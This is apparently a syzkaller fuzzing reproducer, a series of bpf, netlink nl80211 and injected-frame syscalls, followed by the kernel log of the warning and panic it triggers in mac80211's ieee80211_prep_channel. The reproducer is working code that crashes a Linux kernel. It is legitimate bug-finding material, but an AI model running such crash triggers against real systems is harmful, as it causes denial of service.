program:
r0 = bpf$MAP_CREATE(0x0, &(0x7f0000000080)=@base={0x2, 0x4, 0x6, 0x504, 0x0, 0xffffffffffffffff, 0x0, '\x00', 0x0, 0xffffffffffffffff, 0x0, 0x0, 0x0, 0x0, @void, @value, @void, @value}, 0x48)
bpf$MAP_LOOKUP_BATCH(0x18, &(0x7f00000003c0)={0x0, 0x0, &(0x7f0000000000), &(0x7f0000000200), 0xa7c, r0}, 0x38)
r1 = getpid()
r2 = socket$nl_generic(0x10, 0x3, 0x10)
sendmsg$nl_generic(r2, &(0x7f0000000180)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000300)=ANY=[@ANYBLOB="18000000240001030000000000000000010000000400ae"], 0x18}, 0x1, 0x0, 0x0, 0x8001}, 0x4000)
sendmsg$NL80211_CMD_START_AP(0xffffffffffffffff, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000280)=ANY=[@ANYBLOB='00'], 0x30}, 0x1, 0x0, 0x0, 0x18004}, 0x0)
r3 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000100), 0xffffffffffffffff)
r4 = socket$nl_generic(0x10, 0x3, 0x10)
sendmsg$NL80211_CMD_SET_REG(r4, &(0x7f0000000500)={0x0, 0x0, &(0x7f00000004c0)={&(0x7f0000000240)=ANY=[@ANYBLOB='D\x00\x00\x00', @ANYRES16=r3, @ANYBLOB="010000000000800000001a000000280022800414008004000080040000808341f1680200008014000080040000800400008004000080060021"], 0x44}}, 0x0)
recvmmsg(r2, &(0x7f00000086c0)=[{{0x0, 0x0, 0x0}, 0x101}], 0x1, 0x20, 0x0)
r5 = syz_pidfd_open(r1, 0x0)
process_mrelease(r5, 0x0)
syz_80211_inject_frame(&(0x7f0000000240)=@device_b, &(0x7f0000000280)=ANY=[@ANYBLOB="80000000080211000001080211000000aa09b799c0d70000000000000000000064000110000602020202020201010b04060280faff89f33c00005b"], 0xb5)
r6 = socket$nl_generic(0x10, 0x3, 0x10)
r7 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff)
ioctl$sock_SIOCGIFINDEX_80211(r6, 0x8933, &(0x7f00000000c0)={'wlan1\x00', <r8=>0x0})
sendmsg$NL80211_CMD_SET_INTERFACE(r6, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r7, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r8}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0)
sendmsg$NL80211_CMD_CONNECT(r6, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000a00)={0x28, r7, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r8}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}]}, 0x28}}, 0x0)

[   69.161137][ T5308] Bluetooth: hci0: command tx timeout
[   69.221621][ T5323] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium
[   69.249686][ T5323] wlan1: No basic rates, using min rate instead
[   69.253195][ T5323] ------------[ cut here ]------------
[   69.256182][ T5323] WARNING: CPU: 0 PID: 5323 at net/mac80211/mlme.c:1124 ieee80211_prep_channel+0x4e32/0x66e0
[   69.261019][ T5323] Modules linked in:
[   69.262780][ T5323] CPU: 0 UID: 0 PID: 5323 Comm: syz.0.0 Not tainted 6.15.0-rc2-syzkaller-00048-gc62f4b82d571 #0 PREEMPT(full) 
[   69.268017][ T5323] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
[   69.272568][ T5323] RIP: 0010:ieee80211_prep_channel+0x4e32/0x66e0
[   69.275509][ T5323] Code: c6 05 d2 3d 92 04 01 48 c7 c7 37 3f 6d 8d be e8 03 00 00 48 c7 c2 a0 40 6d 8d e8 79 95 e7 f5 e9 03 b5 ff ff e8 6f ce 0b f6 90 <0f> 0b 90 48 8b 7c 24 28 e8 f1 64 6a f6 48 c7 44 24 28 ea ff ff ff
[   69.283644][ T5323] RSP: 0018:ffffc9000d41e440 EFLAGS: 00010283
[   69.286393][ T5323] RAX: ffffffff8bb786c1 RBX: 0000000000000000 RCX: 0000000000100000
[   69.289724][ T5323] RDX: ffffc9000e4da000 RSI: 0000000000000966 RDI: 0000000000000967
[   69.293062][ T5323] RBP: ffffc9000d41e850 R08: ffffffff8bb74707 R09: ffffffff8b85b52c
[   69.296505][ T5323] R10: 000000000000000e R11: ffff88801f774880 R12: dffffc0000000000
[   69.300035][ T5323] R13: ffff88805344e758 R14: ffffc9000d41e710 R15: ffffc9000d41e750
[   69.303300][ T5323] FS:  00007f02372626c0(0000) GS:ffff88808c593000(0000) knlGS:0000000000000000
[   69.306980][ T5323] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   69.309540][ T5323] CR2: 00007f0236583170 CR3: 000000003684e000 CR4: 0000000000352ef0
[   69.312756][ T5323] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   69.316236][ T5323] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   69.319299][ T5323] Call Trace:
[   69.320621][ T5323]  <TASK>
[   69.321794][ T5323]  ? tick_nohz_tick_stopped+0x82/0xb0
[   69.323967][ T5323]  ? ieee80211_prep_channel+0x223/0x66e0
[   69.326364][ T5323]  ? __wake_up_klogd+0xd5/0x110
[   69.328486][ T5323]  ? vprintk_emit+0x81f/0xa40
[   69.330550][ T5323]  ? __pfx_vprintk_emit+0x10/0x10
[   69.332803][ T5323]  ? __pfx_ieee80211_prep_channel+0x10/0x10
[   69.335379][ T5323]  ? ieee80211_mgd_setup_link_sta+0x600/0xb10
[   69.338024][ T5323]  ? __pfx__printk+0x10/0x10
[   69.340009][ T5323]  ? __pfx_ieee80211_mgd_setup_link_sta+0x10/0x10
[   69.342771][ T5323]  ? ieee80211_prep_connection+0x55d/0x1310
[   69.345372][ T5323]  ieee80211_prep_connection+0xda7/0x1310
[   69.347815][ T5323]  ieee80211_mgd_auth+0xf04/0x1770
[   69.350075][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.352237][ T5323]  ? __pfx_ieee80211_mgd_auth+0x10/0x10
[   69.354650][ T5323]  cfg80211_mlme_auth+0x59f/0x970
[   69.357092][ T5323]  cfg80211_conn_do_work+0x637/0xed0
[   69.359241][ T5323]  ? __pfx_cfg80211_conn_do_work+0x10/0x10
[   69.361634][ T5323]  ? _raw_spin_unlock_irqrestore+0x90/0x140
[   69.364041][ T5323]  ? lockdep_hardirqs_on+0x9d/0x150
[   69.366261][ T5323]  ? rcu_is_watching+0x15/0xb0
[   69.368225][ T5323]  ? trace_cfg80211_return_bss+0x87/0x210
[   69.370472][ T5323]  ? __cfg80211_get_bss+0x613/0x7d0
[   69.372563][ T5323]  ? cfg80211_connect+0x16cc/0x20e0
[   69.374728][ T5323]  cfg80211_connect+0x1758/0x20e0
[   69.377055][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.379055][ T5323]  ? reacquire_held_locks+0x12a/0x1e0
[   69.381313][ T5323]  ? __pfx_cfg80211_connect+0x10/0x10
[   69.383621][ T5323]  ? __asan_memset+0x23/0x50
[   69.385647][ T5323]  ? nl80211_crypto_settings+0xb6d/0xf10
[   69.388015][ T5323]  nl80211_connect+0x1d57/0x24b0
[   69.390090][ T5323]  ? __pfx_nl80211_connect+0x10/0x10
[   69.392372][ T5323]  ? trace_contention_end+0x3c/0x120
[   69.394617][ T5323]  genl_rcv_msg+0xb38/0xf00
[   69.396564][ T5323]  ? __pfx_genl_rcv_msg+0x10/0x10
[   69.398505][ T5323]  ? __dev_queue_xmit+0x1780/0x3f60
[   69.400606][ T5323]  ? kasan_save_track+0x3f/0x80
[   69.402790][ T5323]  ? __kasan_slab_alloc+0x66/0x80
[   69.405047][ T5323]  ? do_syscall_64+0xf3/0x230
[   69.406977][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.408920][ T5323]  ? __pfx_nl80211_pre_doit+0x10/0x10
[   69.411221][ T5323]  ? __pfx_nl80211_connect+0x10/0x10
[   69.413401][ T5323]  ? __pfx_nl80211_post_doit+0x10/0x10
[   69.415919][ T5323]  netlink_rcv_skb+0x208/0x480
[   69.417978][ T5323]  ? __pfx_genl_rcv_msg+0x10/0x10
[   69.420164][ T5323]  ? __pfx_netlink_rcv_skb+0x10/0x10
[   69.422300][ T5323]  ? netlink_deliver_tap+0x2e/0x1b0
[   69.424603][ T5323]  genl_rcv+0x28/0x40
[   69.426549][ T5323]  netlink_unicast+0x7f8/0x9a0
[   69.428680][ T5323]  ? __pfx_netlink_unicast+0x10/0x10
[   69.430964][ T5323]  ? skb_put+0x114/0x1f0
[   69.432813][ T5323]  netlink_sendmsg+0x8c3/0xcd0
[   69.435149][ T5323]  ? __pfx_netlink_sendmsg+0x10/0x10
[   69.437521][ T5323]  ? aa_sock_msg_perm+0x91/0x160
[   69.439743][ T5323]  ? __pfx_netlink_sendmsg+0x10/0x10
[   69.442159][ T5323]  __sock_sendmsg+0x221/0x270
[   69.444359][ T5323]  ____sys_sendmsg+0x523/0x860
[   69.446670][ T5323]  ? __pfx_____sys_sendmsg+0x10/0x10
[   69.448923][ T5323]  ? __fget_files+0x2a/0x420
[   69.450977][ T5323]  ? __fget_files+0x2a/0x420
[   69.453060][ T5323]  __sys_sendmsg+0x271/0x360
[   69.455336][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.457328][ T5323]  ? __pfx___sys_sendmsg+0x10/0x10
[   69.459586][ T5323]  ? do_syscall_64+0xb6/0x230
[   69.461560][ T5323]  do_syscall_64+0xf3/0x230
[   69.463544][ T5323]  ? clear_bhb_loop+0x45/0xa0
[   69.465649][ T5323]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   69.468190][ T5323] RIP: 0033:0x7f023638e169
[   69.470242][ T5323] Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48
[   69.478399][ T5323] RSP: 002b:00007f0237262038 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   69.481877][ T5323] RAX: ffffffffffffffda RBX: 00007f02365b5fa0 RCX: 00007f023638e169
[   69.485317][ T5323] RDX: 0000000000000000 RSI: 00002000000001c0 RDI: 0000000000000007
[   69.489018][ T5323] RBP: 00007f0236410a68 R08: 0000000000000000 R09: 0000000000000000
[   69.492388][ T5323] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[   69.495740][ T5323] R13: 0000000000000000 R14: 00007f02365b5fa0 R15: 00007ffd1a3f4b28
[   69.499222][ T5323]  </TASK>
[   69.500721][ T5323] Kernel panic - not syncing: kernel: panic_on_warn set ...
[   69.503895][ T5323] CPU: 0 UID: 0 PID: 5323 Comm: syz.0.0 Not tainted 6.15.0-rc2-syzkaller-00048-gc62f4b82d571 #0 PREEMPT(full) 
[   69.508799][ T5323] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
[   69.513571][ T5323] Call Trace:
[   69.514970][ T5323]  <TASK>
[   69.516470][ T5323]  dump_stack_lvl+0x241/0x360
[   69.518421][ T5323]  ? __pfx_dump_stack_lvl+0x10/0x10
[   69.520518][ T5323]  ? __pfx__printk+0x10/0x10
[   69.522300][ T5323]  ? vscnprintf+0x5d/0x90
[   69.523989][ T5323]  panic+0x349/0x880
[   69.525487][ T5323]  ? __warn+0x174/0x4d0
[   69.527066][ T5323]  ? __pfx_panic+0x10/0x10
[   69.528718][ T5323]  __warn+0x344/0x4d0
[   69.530220][ T5323]  ? ieee80211_prep_channel+0x4e32/0x66e0
[   69.532279][ T5323]  report_bug+0x2b3/0x500
[   69.533934][ T5323]  ? ieee80211_prep_channel+0x4e32/0x66e0
[   69.536194][ T5323]  ? ieee80211_prep_channel+0x4e32/0x66e0
[   69.538446][ T5323]  ? ieee80211_prep_channel+0x4e34/0x66e0
[   69.540650][ T5323]  handle_bug+0x89/0x170
[   69.542404][ T5323]  exc_invalid_op+0x1a/0x50
[   69.544271][ T5323]  asm_exc_invalid_op+0x1a/0x20
[   69.546324][ T5323] RIP: 0010:ieee80211_prep_channel+0x4e32/0x66e0
[   69.548864][ T5323] Code: c6 05 d2 3d 92 04 01 48 c7 c7 37 3f 6d 8d be e8 03 00 00 48 c7 c2 a0 40 6d 8d e8 79 95 e7 f5 e9 03 b5 ff ff e8 6f ce 0b f6 90 <0f> 0b 90 48 8b 7c 24 28 e8 f1 64 6a f6 48 c7 44 24 28 ea ff ff ff
[   69.556466][ T5323] RSP: 0018:ffffc9000d41e440 EFLAGS: 00010283
[   69.559062][ T5323] RAX: ffffffff8bb786c1 RBX: 0000000000000000 RCX: 0000000000100000
[   69.562304][ T5323] RDX: ffffc9000e4da000 RSI: 0000000000000966 RDI: 0000000000000967
[   69.565689][ T5323] RBP: ffffc9000d41e850 R08: ffffffff8bb74707 R09: ffffffff8b85b52c
[   69.568724][ T5323] R10: 000000000000000e R11: ffff88801f774880 R12: dffffc0000000000
[   69.571757][ T5323] R13: ffff88805344e758 R14: ffffc9000d41e710 R15: ffffc9000d41e750
[   69.574921][ T5323]  ? cfg80211_get_end_freq+0x7c/0x1d0
[   69.577206][ T5323]  ? ieee80211_prep_channel+0xe77/0x66e0
[   69.579549][ T5323]  ? ieee80211_prep_channel+0x4e31/0x66e0
[   69.581831][ T5323]  ? tick_nohz_tick_stopped+0x82/0xb0
[   69.584038][ T5323]  ? ieee80211_prep_channel+0x223/0x66e0
[   69.586390][ T5323]  ? __wake_up_klogd+0xd5/0x110
[   69.588435][ T5323]  ? vprintk_emit+0x81f/0xa40
[   69.590393][ T5323]  ? __pfx_vprintk_emit+0x10/0x10
[   69.592433][ T5323]  ? __pfx_ieee80211_prep_channel+0x10/0x10
[   69.594892][ T5323]  ? ieee80211_mgd_setup_link_sta+0x600/0xb10
[   69.597554][ T5323]  ? __pfx__printk+0x10/0x10
[   69.599493][ T5323]  ? __pfx_ieee80211_mgd_setup_link_sta+0x10/0x10
[   69.602138][ T5323]  ? ieee80211_prep_connection+0x55d/0x1310
[   69.604661][ T5323]  ieee80211_prep_connection+0xda7/0x1310
[   69.607180][ T5323]  ieee80211_mgd_auth+0xf04/0x1770
[   69.609320][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.611336][ T5323]  ? __pfx_ieee80211_mgd_auth+0x10/0x10
[   69.613612][ T5323]  cfg80211_mlme_auth+0x59f/0x970
[   69.615709][ T5323]  cfg80211_conn_do_work+0x637/0xed0
[   69.617994][ T5323]  ? __pfx_cfg80211_conn_do_work+0x10/0x10
[   69.620305][ T5323]  ? _raw_spin_unlock_irqrestore+0x90/0x140
[   69.622463][ T5323]  ? lockdep_hardirqs_on+0x9d/0x150
[   69.624444][ T5323]  ? rcu_is_watching+0x15/0xb0
[   69.626378][ T5323]  ? trace_cfg80211_return_bss+0x87/0x210
[   69.628605][ T5323]  ? __cfg80211_get_bss+0x613/0x7d0
[   69.630666][ T5323]  ? cfg80211_connect+0x16cc/0x20e0
[   69.632761][ T5323]  cfg80211_connect+0x1758/0x20e0
[   69.634962][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.637034][ T5323]  ? reacquire_held_locks+0x12a/0x1e0
[   69.639167][ T5323]  ? __pfx_cfg80211_connect+0x10/0x10
[   69.641303][ T5323]  ? __asan_memset+0x23/0x50
[   69.643183][ T5323]  ? nl80211_crypto_settings+0xb6d/0xf10
[   69.645387][ T5323]  nl80211_connect+0x1d57/0x24b0
[   69.647422][ T5323]  ? __pfx_nl80211_connect+0x10/0x10
[   69.649501][ T5323]  ? trace_contention_end+0x3c/0x120
[   69.651634][ T5323]  genl_rcv_msg+0xb38/0xf00
[   69.653460][ T5323]  ? __pfx_genl_rcv_msg+0x10/0x10
[   69.655339][ T5323]  ? __dev_queue_xmit+0x1780/0x3f60
[   69.657265][ T5323]  ? kasan_save_track+0x3f/0x80
[   69.659017][ T5323]  ? __kasan_slab_alloc+0x66/0x80
[   69.660804][ T5323]  ? do_syscall_64+0xf3/0x230
[   69.662478][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.664295][ T5323]  ? __pfx_nl80211_pre_doit+0x10/0x10
[   69.666293][ T5323]  ? __pfx_nl80211_connect+0x10/0x10
[   69.668206][ T5323]  ? __pfx_nl80211_post_doit+0x10/0x10
[   69.670328][ T5323]  netlink_rcv_skb+0x208/0x480
[   69.672160][ T5323]  ? __pfx_genl_rcv_msg+0x10/0x10
[   69.674128][ T5323]  ? __pfx_netlink_rcv_skb+0x10/0x10
[   69.676329][ T5323]  ? netlink_deliver_tap+0x2e/0x1b0
[   69.678403][ T5323]  genl_rcv+0x28/0x40
[   69.680037][ T5323]  netlink_unicast+0x7f8/0x9a0
[   69.681935][ T5323]  ? __pfx_netlink_unicast+0x10/0x10
[   69.683968][ T5323]  ? skb_put+0x114/0x1f0
[   69.685718][ T5323]  netlink_sendmsg+0x8c3/0xcd0
[   69.687688][ T5323]  ? __pfx_netlink_sendmsg+0x10/0x10
[   69.689781][ T5323]  ? aa_sock_msg_perm+0x91/0x160
[   69.691682][ T5323]  ? __pfx_netlink_sendmsg+0x10/0x10
[   69.693820][ T5323]  __sock_sendmsg+0x221/0x270
[   69.695718][ T5323]  ____sys_sendmsg+0x523/0x860
[   69.697738][ T5323]  ? __pfx_____sys_sendmsg+0x10/0x10
[   69.699862][ T5323]  ? __fget_files+0x2a/0x420
[   69.701752][ T5323]  ? __fget_files+0x2a/0x420
[   69.703614][ T5323]  __sys_sendmsg+0x271/0x360
[   69.705441][ T5323]  ? __lock_acquire+0xad5/0xd80
[   69.707414][ T5323]  ? __pfx___sys_sendmsg+0x10/0x10
[   69.709461][ T5323]  ? do_syscall_64+0xb6/0x230
[   69.711386][ T5323]  do_syscall_64+0xf3/0x230
[   69.713239][ T5323]  ? clear_bhb_loop+0x45/0xa0
[   69.715078][ T5323]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   69.717238][ T5323] RIP: 0033:0x7f023638e169
[   69.718913][ T5323] Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48
[   69.725853][ T5323] RSP: 002b:00007f0237262038 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   69.729104][ T5323] RAX: ffffffffffffffda RBX: 00007f02365b5fa0 RCX: 00007f023638e169
[   69.732174][ T5323] RDX: 0000000000000000 RSI: 00002000000001c0 RDI: 0000000000000007
[   69.735359][ T5323] RBP: 00007f0236410a68 R08: 0000000000000000 R09: 0000000000000000
[   69.738475][ T5323] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[   69.741661][ T5323] R13: 0000000000000000 R14: 00007f02365b5fa0 R15: 00007ffd1a3f4b28
[   69.744809][ T5323]  </TASK>
[   69.746344][ T5323] Kernel Offset: disabled
[   69.748118][ T5323] Rebooting in 86400 seconds..